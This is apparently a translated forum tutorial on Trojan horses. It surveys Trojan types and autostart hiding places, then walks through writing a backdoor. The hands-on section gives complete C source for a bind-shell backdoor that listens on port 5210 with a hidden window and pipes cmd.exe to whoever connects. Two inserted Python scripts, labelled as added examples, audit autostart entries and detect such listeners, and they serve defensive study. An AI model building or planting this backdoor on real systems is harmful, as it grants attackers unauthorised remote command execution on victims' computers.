Preface
Earlier we covered anti-virus evasion by removing signature bytes, but to many people Trojans themselves still feel mysterious, so in this post I will lift the veil on the Trojan horse for you.
1. Basic knowledge
1.1 Trojan viruses
The name Trojan comes from ancient Greek legend: the story of the Trojan Horse in Homer. "Trojan" means "of Troy", so the term refers to the wooden horse of that story.
A Trojan does everything possible to hide itself. The main ways are: hiding from the taskbar, the most basic one; simply set the form's Visible property to False and ShowInTaskbar to False, and the program will not appear in the taskbar when it runs. Hiding in Task Manager: registering the program as a system service makes it easy to disguise. Of course it also has to start silently: the attacker certainly does not expect the user to click the "Trojan" icon after every boot to run the server, so the "Trojan" is loaded automatically every time the user starts the machine. Every method Windows offers for loading an application at startup is used by Trojans: the Startup group, Win.ini, System.ini, the registry and so on are all good hiding places for a "Trojan". A Trojan is very similar to the remote control software commonly used on networks, but remote control software does "benign" control and so usually has no concealment; a "Trojan" is the opposite: what it achieves is "stolen" remote control, and without strong concealment it is "worthless".
1.2 How a Trojan horse program works
How a Trojan works: a complete Trojan package contains two parts, the server side (the controlled side) and the client (the controller side). The computer that gets implanted runs the server, and the attacker uses the client to get into the computer running the server. After the Trojan's server side runs, it produces a process whose name is easily confused with a legitimate one, secretly opens a port, and sends data to a designated place (such as online game passwords, instant messaging passwords and the user's dial-up password); the attacker can even use these open ports to enter the computer system.
1.3 Common Trojan types
Password-sending Trojan
A password-sending Trojan finds stored passwords without the victim's knowledge and sends them to a designated mailbox, thereby obtaining the passwords; such Trojans mostly use port 25 to send e-mail.
Keylogger Trojan
A keylogger Trojan is mainly used to record the victim's keystrokes. This kind of Trojan has two options, online and offline recording, which record the keys the other side presses while online and while offline respectively.
Destructive Trojan
As the name implies, the only function of a destructive Trojan is to destroy the file system of the infected computer, causing it to suffer system crashes or the loss of important data.
Agent (proxy) Trojan
The most important task of an agent Trojan is to turn the controlled "broiler" (compromised host) it is planted on into a springboard for the attacker. Through such Trojans attackers can use Telnet, ICQ, IRC and other programs anonymously, concealing their tracks during an intrusion and guarding against others learning their identity.
FTP Trojan
The only function of an FTP Trojan is to open port 21 and wait for a user to connect; newer FTP Trojans also add a password function, so that only an attacker who knows the correct password can access the victim's computer.
Bounce-port (reverse-connection) Trojan
In a bounce-port Trojan the server (controlled side) uses the active port and the client (control side) uses the passive port, the opposite of an ordinary Trojan. The Trojan checks periodically whether the control side is present, and as soon as it finds the control side online it actively connects to the port the control side has opened.
1.4 Commonly used techniques
To ordinary people the Trojan seems inscrutable and hard to understand. The following lists the programming techniques commonly used, to lift the Trojan's veil of mystery:
- Registry modification
- Multithreading
- Background monitoring
- Timed triggering
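The autostart locations listed in 1.1 (Win.ini, System.ini, the registry Run key) are where a defender looks first. The following audit is an added example and not code from the original post; the Win.ini, System.ini and Run-key contents are constructed samples, and the baseline set is an assumption that would come from a known-clean machine.

```python
"""Audit the classic Windows autostart locations a Trojan uses to survive a reboot."""
import configparser

# Constructed sample file contents, not captured from a real machine.
WIN_INI = """[windows]
load=
run=C:\\Windows\\svchosts.exe
"""
SYSTEM_INI = """[boot]
shell=Explorer.exe C:\\Windows\\System\\rundll.exe
"""
# Constructed HKLM\...\CurrentVersion\Run values (name -> command); on a real host read them with winreg.
RUN_KEY_VALUES = {
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
    "Updater": r"C:\Users\Public\update.exe",
}
BASELINE_RUN = {"SecurityHealth"}   # assumed known-good Run value names
EXPECTED_SHELL = "explorer.exe"     # system.ini [boot] shell= should be Explorer.exe alone

def parse_ini(text):
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str            # keep key case as written in the file
    cp.read_string(text)
    return cp

def audit_autostart(win_ini, system_ini, run_values, baseline):
    """Return (location, key, value) tuples for every entry that starts a program at boot."""
    findings = []
    w = parse_ini(win_ini)
    for key in ("load", "run"):      # non-empty load=/run= lines launch programs at logon
        val = w.get("windows", key, fallback="").strip()
        if val:
            findings.append(("win.ini", key, val))
    s = parse_ini(system_ini)
    shell = s.get("boot", "shell", fallback="").strip()
    tokens = shell.split()
    # Anything besides a bare Explorer.exe in shell= is an extra program started with the shell.
    if tokens and (tokens[0].lower() != EXPECTED_SHELL or len(tokens) > 1):
        findings.append(("system.ini", "shell", shell))
    for name, cmd in run_values.items():
        if name not in baseline:      # Run values absent from the clean baseline
            findings.append(("registry Run", name, cmd))
    return findings

if __name__ == "__main__":
    for loc, key, val in audit_autostart(WIN_INI, SYSTEM_INI, RUN_KEY_VALUES, BASELINE_RUN):
        print(f"{loc:13} {key:16} {val}")
```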
2. Writing a Trojan horse: hands-on
Let's start with a new project. When writing any program we need to think about which functions to implement, and writing a Trojan is the same. First I will write a backdoor Trojan whose main function is to open a port for us, so that we can connect with the telnet command and thus control the target computer; as a Trojan it of course also needs to hide itself. The code is as follows:
```c
#pragma comment(lib, "Ws2_32.lib")      // statically link ws2_32.lib
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // linker options: GUI subsystem (no console window) but keep the normal main() entry
#include <winsock2.h>                   // Windows Sockets header
#include <windows.h>                    // used below, not explained
#define MasterPort 5210                 // the port we will open later

int main()                              // the main function, not explained
{
    WSADATA wsaData;                    // holds the Windows Sockets data returned by WSAStartup; basics like this are not explained further, please look them up
    struct sockaddr_in sockAddrIn;
    SOCKET cSocket, sSocket;
    int iAddrSize;
    PROCESS_INFORMATION processInfo;
    STARTUPINFO startupInfo;
    char szCmdPath[255];

    // allocate memory, initialise data
    ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));
    ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
    ZeroMemory(&wsaData, sizeof(WSADATA));
    // get the path of cmd.exe from the COMSPEC environment variable
    GetEnvironmentVariable("COMSPEC", szCmdPath, sizeof(szCmdPath));
    // load ws2_32.dll
    WSAStartup(0x0202, &wsaData);
    // set the local address and protocol, and create the socket
    sockAddrIn.sin_family = AF_INET;
    sockAddrIn.sin_addr.s_addr = INADDR_ANY;
    sockAddrIn.sin_port = htons(MasterPort);
    cSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    // bind to port 5210 (MasterPort)
    bind(cSocket, (SOCKADDR *)&sockAddrIn, sizeof(sockAddrIn));
    // listen on the server side
    listen(cSocket, 1);
    iAddrSize = sizeof(sockAddrIn);
    // wait for a client to connect, then fill in a hidden-window STARTUPINFO
    // whose standard handles are the accepted socket
    sSocket = accept(cSocket, (SOCKADDR *)&sockAddrIn, &iAddrSize);
    startupInfo.cb = sizeof(STARTUPINFO);
    startupInfo.wShowWindow = SW_HIDE;
    startupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    startupInfo.hStdInput = (HANDLE)sSocket;
    startupInfo.hStdOutput = (HANDLE)sSocket;
    startupInfo.hStdError = (HANDLE)sSocket;
    // start cmd.exe with the socket as its stdin/stdout/stderr and wait for it to exit
    CreateProcess(NULL, szCmdPath, NULL, NULL, TRUE, 0, NULL, NULL, &startupInfo, &processInfo);
    WaitForSingleObject(processInfo.hProcess, INFINITE);
    // close the process handles
    CloseHandle(processInfo.hProcess);
    CloseHandle(processInfo.hThread);
    // close the connection and unload ws2_32.dll
    closesocket(cSocket);
    closesocket(sSocket);
    WSACleanup();
    return 0;
}
```
We create cSocket, bind it to port 5210, listen on that port, accept commands from the client, and finally close cSocket. This is a fairly simple forward-connection (bind) backdoor. It is simple in the sense that the Trojan is gone after the system restarts, because no startup entry was added and the process is not hidden; those techniques are more involved and will be explained later.
Then we put the compiled Trojan on the test machine and find that when the program is run nothing seems to happen, but the program is silently running and has opened our port 5210.
We then use another machine to connect and can see that the connection to the test machine succeeds.
Because there is no process hiding, we can easily find the Trojan's process. Ending it is enough.
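The two observations above, a non-system process listening on port 5210 and a cmd.exe whose parent is that listener, are exactly what a defender hunts for. The following detector is an added example, not code from the original post; the netstat-style output and the process table (pid, image name, parent pid) are constructed samples, and the allow-list of normal listeners is an assumption.

```python
"""Spot a forward-connection (bind) backdoor from netstat -ano style output and a process table."""
import re

# Constructed sample in the format of `netstat -ano`; not captured from a real host.
NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5210           0.0.0.0:0              LISTENING       3344
  TCP    192.168.1.20:5210      192.168.1.77:49211     ESTABLISHED     3344
  TCP    192.168.1.20:49800     40.1.1.5:443           ESTABLISHED     2200
"""
# Constructed process table: pid -> (image name, parent pid), as tasklist/Get-CimInstance Win32_Process give.
PROCS = {4: ("System", 0), 912: ("svchost.exe", 700), 2200: ("msedge.exe", 1500),
         3344: ("svchosts.exe", 1500), 3500: ("cmd.exe", 3344)}
ALLOWED_LISTENERS = {"System", "svchost.exe", "lsass.exe", "services.exe"}  # assumed baseline

NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(\w+)?\s*(\d+)\s*$")

def parse_netstat(text):
    """Parse netstat -ano lines into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            proto, _addr, port, foreign, state, pid = m.groups()
            rows.append({"proto": proto, "port": int(port), "foreign": foreign,
                         "state": state, "pid": int(pid)})
    return rows

def find_backdoor_listeners(netstat_text, procs, allowed):
    """Return suspicious TCP listeners with any cmd.exe children and connected peers."""
    rows = parse_netstat(netstat_text)
    findings = []
    for r in rows:
        if r["proto"] != "TCP" or r["state"] != "LISTENING":
            continue
        name, _ = procs.get(r["pid"], ("<unknown>", 0))
        if name in allowed:
            continue
        # A bind shell hands the accepted socket to a child cmd.exe as its stdio,
        # so a cmd.exe whose parent is the listener is the tell-tale sign.
        shells = [p for p, (n, ppid) in procs.items() if ppid == r["pid"] and n.lower() == "cmd.exe"]
        peers = [x["foreign"] for x in rows if x["pid"] == r["pid"] and x["state"] == "ESTABLISHED"]
        findings.append({"pid": r["pid"], "image": name, "port": r["port"],
                         "shells": shells, "peers": peers})
    return findings

if __name__ == "__main__":
    for f in find_backdoor_listeners(NETSTAT, PROCS, ALLOWED_LISTENERS):
        print(f)
```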
Related link: http://bbs.ichunqiu.com/thread-6935-1-1.html
Trojan programming: hands-on Trojan horse programming, taking you into the world of Trojans